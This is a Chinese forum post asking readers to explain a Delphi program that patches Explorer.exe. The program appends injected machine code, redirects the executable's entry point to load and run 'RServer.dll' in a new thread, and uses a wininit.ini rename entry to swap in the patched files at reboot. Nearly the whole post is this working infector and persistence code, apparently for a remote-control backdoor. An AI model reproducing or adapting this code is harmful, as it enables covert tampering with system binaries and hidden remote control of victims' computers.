源码讨论!!!!高手抢分!!菜鸟也可来学习学习!!!
谁能为我详细地说明以下代码,100分就给谁!注意,这100分只给最好的一个人!!
本程序是在Explorer.exe中加入一小段代码。
program AddShell;
uses
windows,messages,sysutils,classes;
const CRLF=#13#10;
//;以下内容固定不变
FunctionName =0;
DllName =FunctionName+9;
WndClassName =DllName+13; //;[WndClassName]="RServer"
CodeBegin =WndClassName+$12;
//
type TImportTable=record
FunctionAddress,TimeDateStamp,ForwardLink,DllName,FunctionRaw:dword;
end;
type TObjectSectionInfo=record
VirtualSize,VirtualAddress,RawDataSize,RawDataAddress:dword;
end;
type TBaseInfo=record
EntryPoint,BaseCode,BaseData,ImageBase:dword;
end;
type TPeInfo=record
Base,TextObjectBase,DataObjectBase,Attrib:dword;
Bs:TBaseInfo;
BaseImport:dword;
Otext,Odata,OImport,OReloc:TObjectSectionInfo;
end;
var
windir:array[0..100] of char;
codebuf:array[0..$200] of byte; //数据据和代码缓冲区
PeFileHandle:integer;
// ts:tstrings;
Pe:TPeInfo;
cp:dword;
NewEntryPoint,NewJump:dword; //=1000h
procedure DwordtoByte(vard,vapd:dword);
begin
codebuf[cp+vapd]:=vard;
codebuf[cp+vapd+1]:=vard shr 8;
codebuf[cp+vapd+2]:=vard shr $10;
codebuf[cp+vapd+3]:=vard shr $18;
end;
procedure StrToByte(str:string;vapd:dword);
var k:integer;
begin
for k:=0 to length(str)-1 do
codebuf[vapd+k]:=byte(str[k+1]);
end;
function GetPeInformation:boolean;
var
varw:word;
vard,vald:dword;
ts:tstrings;
// Ip:TImportTable;
begin
result:=true;
ts:=tstringlist.create;
FileSeek(PeFileHandle,$18,0); //检测是否PE文件
FileRead(PeFileHandle,varw,2);
if(varw<>$40) then
begin
messagebox(0,'Not a PE File!!!',pchar(format('Info:%x',[varw])),0);
result:=false;
exit;
end;
ts.add(format('$18=$%x[PE File]',[varw]));
FileSeek(PeFileHandle,$3c,0); //取得PE头的位置
FileRead(PeFileHandle,vard,4);
Pe.Base:=vard;
ts.add(format('$3C=$%x[PE Begin]',[vard]));
FileSeek(PeFileHandle,vard,0); //取得PE标志
FileRead(PeFileHandle,vald,4);
if(vald<>$4550) then
begin
messagebox(0,'Not a PE File!!!',pchar(format('Info:%x',[vald])),0);
result:=false;
exit;
end;
ts.add(format('$%x=$%x[PE Signal]',[vard,vald]));
//读取EntryPoint,BaseCode,BaseData,ImageBase
vard:=Pe.Base+$28;
FileSeek(PeFileHandle,vard,0);
FileRead(PeFileHandle,Pe.Bs,$10);
ts.add(format('$%x=$%x[EntryPoint]',[vard,Pe.Bs.EntryPoint]));
ts.add(format('$%x=$%x[BaseCode]',[vard,Pe.Bs.BaseCode]));
//读取BaseImport
vard:=Pe.Base+$80;
FileSeek(PeFileHandle,vard,0);
FileRead(PeFileHandle,vald,4);
Pe.BaseImport:=vald;
ts.add(format('$%x=$%x[BaseImport]',[vard,vald]));
//
//读取.text
vard:=Pe.Base+$100;
while(true) do
begin
FileSeek(PeFileHandle,vard,0);
FileRead(PeFileHandle,Pe.Otext,$10);
if(Pe.Otext.VirtualAddress=Pe.Bs.BaseCode) then break;
inc(vard,$28);
end;
Pe.TextObjectBase:=vard;
ts.add(format('$%x=$%x[.text.VirtualSize]',[vard,Pe.Otext.VirtualSize]));
//读取.Import
vard:=Pe.Base+$100;
while(true) do
begin
FileSeek(PeFileHandle,vard,0);
FileRead(PeFileHandle,Pe.Oimport,$10);
if(Pe.BaseImport>=Pe.Oimport.VirtualAddress) and (Pe.BaseImport<=Pe.Oimport.VirtualAddress+Pe.Oimport.VirtualSize) then break;
inc(vard,$28);
end;
ts.add(format('$%x=$%x[Pe.BaseImport]',[vard,Pe.BaseImport]));
ts.free;
//
ts:=tstringlist.create;
ts.add('[rename]');
ts.add(strpas(windir)+'\Explorer.exe='+strpas(windir)+'\Explorer.new');
ts.add(strpas(windir)+'\RServer.dll='+strpas(windir)+'\RServer.new');
// ts.add(strpas(windir)+'\RControl.exe='+strpas(windir)+'\RControl.new');
ts.savetofile(strpas(windir)+'\'+'wininit.ini');
ts.free;
//
end;
//
function FindWin32Api(var CurrentPosition:dword;Win32ApiName:string):boolean;
var
varw:word;
vard,vald,vafd,vavd,vakd,ipdif:dword;
varpc:array[0..200] of char;
Ip:TImportTable;
begin
//寻找Win32 Api Import Address
result:=false;
vard:=Pe.Oimport.RawDataAddress; //取得Import的文件起始地址;
ipdif:=Pe.Oimport.VirtualAddress-Pe.Oimport.RawDataAddress;//计算内存地址和文件地址的差异
vard:=Pe.BaseImport-ipdif;
while(true) do
begin
FileSeek(PeFileHandle,vard,0);
FileRead(PeFileHandle,Ip,$14);
if(Ip.FunctionAddress=0) then break; //若Dll链结束,则退出Dll链循环
vald:=Ip.FunctionAddress-ipdif;
vakd:=Ip.FunctionRaw-ipdif;
while(true) do
begin
FileSeek(PeFileHandle,vald,0);
FileRead(PeFileHandle,vafd,$4);
if(vafd=0) then break; //若函数链结束,则退出函数链循环
vavd:=vafd-ipdif;
FileSeek(PeFileHandle,vavd,0);
FileRead(PeFileHandle,varw,2);//取得函数的Hint 序号
FileSeek(PeFileHandle,vavd+2,0);
FileRead(PeFileHandle,varpc,$20); //取得函数的名称
if strcomp(varpc,pchar(Win32ApiName))=0 then
begin
//翻译Call Dword ptr[Win32ApiName]
vavd:=vakd+ipdif+Pe.bs.ImageBase;
codebuf[cp]:=$ff;
codebuf[cp+1]:=$15;
DwordtoByte(vavd,2);
inc(cp,6);
result:=true;
exit;
end;
inc(vald,$4);
inc(vakd,$4);
end;
inc(vard,$14);
end;
end;
procedure asm32;
var k:integer;
vard:dword;
begin
GetPeInformation;
cp:=0;
for k:=0 to $200 do codebuf[k]:=0; //代码区清零
//
DwordtoByte($23e8,0); inc(cp,5); //call fn_5
//
StrToByte('run',FunctionName+cp);
StrToByte('RServer.dll',DllName+cp);
StrToByte('Progman',WndClassName+cp);
inc(cp,CodeBegin-5);
//
codebuf[cp]:=$5B; inc(cp,1); //pop ebx
DwordtoByte($29e8,0); inc(cp,5); //call fn_5
//
DwordtoByte($c5d8b,0); inc(cp,3); //mov ebx,[ebp+0ch]
DwordtoByte($9438d,0); inc(cp,3); //lea eax,[ebx+DllName]
codebuf[cp]:=$50; inc(cp,1); //push eax
FindWin32Api(cp,'LoadLibraryA'); //call dword ptr [LoadLibraryA]
DwordtoByte($c00b,0); inc(cp,2); //or eax,eax
DwordtoByte($1774,0); inc(cp,2); //jz loc_50
//
DwordtoByte($f88b,0); inc(cp,2); //mov edi,eax
codebuf[cp]:=$53; inc(cp,1); //push ebx ;[ebx+FunctionName]
codebuf[cp]:=$57; inc(cp,1); //push edi
FindWin32Api(cp,'GetProcAddress'); //call dword ptr [GetProcAddress]
DwordtoByte($c00b,0); inc(cp,2); //or eax,eax
DwordtoByte($274,0); inc(cp,2); //jz loc_46
//
DwordtoByte($d0ff,0); inc(cp,2); //call eax
//
codebuf[cp]:=$57; inc(cp,1); //push edi
FindWin32Api(cp,'FreeLibrary'); //call dword ptr [FreeLibrary]
codebuf[cp]:=$c3; inc(cp,1); //ret
//
codebuf[cp]:=$5f; inc(cp,1); //pop edi
DwordtoByte($6a,0); inc(cp,2); //push 0
DwordtoByte($16438d,0); inc(cp,3); //lea eax,[ebx+WndClassName]
codebuf[cp]:=$50; inc(cp,1); //push eax
FindWin32Api(cp,'FindWindowA'); //call dword ptr [FindWindowA]
DwordtoByte($c00b,0); inc(cp,2); //or eax,eax
DwordtoByte($1575,0); inc(cp,2); //jnz loc_7d
//
DwordtoByte($4ec83,0); inc(cp,3); //sub esp,4
codebuf[cp]:=$54; inc(cp,1); //push esp
DwordtoByte($6a,0); inc(cp,2); //push 0
codebuf[cp]:=$53; inc(cp,1); //push ebx
codebuf[cp]:=$57; inc(cp,1); //push edi
DwordtoByte($6a,0); inc(cp,2); //push 0
DwordtoByte($6a,0); inc(cp,2); //push 0
FindWin32Api(cp,'CreateThread'); //call dword ptr [CreateThread]
DwordtoByte($4c483,0); inc(cp,3); //add esp,4
//
codebuf[cp]:=$e9; inc(cp,1); //jmp OldEntryPoint
NewEntryPoint:=Pe.OText.VirtualSize+Pe.Otext.VirtualAddress;
NewJump:=Pe.Bs.EntryPoint-(NewEntryPoint+Cp+4);
DwordtoByte(NewJump,0); inc(cp,4); //
//修改PE中的信息
vard:=Pe.Base+$28; //新的入口点
FileSeek(PeFileHandle,vard,0);
FileWrite(PeFileHandle,NewEntryPoint,4);
vard:=Pe.TextObjectBase; //新的.text大小
FileSeek(PeFileHandle,vard,0);
vard:=Pe.Otext.VirtualSize+cp;
FileWrite(PeFileHandle,vard,4);
vard:=Pe.Otext.RawDataAddress+Pe.Otext.VirtualSize; //写codebuf
FileSeek(PeFileHandle,vard,0);
FileWrite(PeFileHandle,codebuf,cp);
end;
begin
if(GetWindowsDirectory(windir,100)<100) then
begin
if fileexists(strpas(windir)+'\Explorer.old')=false then copyfile(pchar(strpas(windir)+'\Explorer.exe'),pchar(strpas(windir)+'\Explorer.old'),false);
copyfile(pchar(strpas(windir)+'\Explorer.old'),pchar(strpas(windir)+'\Explorer.new'),false);
copyfile(pchar('RServer.dll'),pchar(strpas(windir)+'\RServer.new'),false);
// copyfile(pchar('RControl.exe'),pchar(strpas(windir)+'\RControl.exe'),false);
PeFileHandle:=FileOpen(strpas(windir)+'\Explorer.new', fmOpenReadWrite or fmShareDenyNone);
if(PeFileHandle<>-1) then asm32
else MessageBox(0,'PE File Not Found!!!','error',0);
FileClose(PeFileHandle);
messagebox(0,'Pach for:'+CRLF+CRLF+'Windows 95 OSR2'+CRLF+'Windows 98 Second Edition'+CRLF+'Windows 2000 Professional'+CRLF+CRLF+'OK,Pach compelete!!!','hotsky.363.net',0);
end else messagebox(0,'error,can''t found Windows Directory,current pach isn''t compelete!!!','error',0);
end.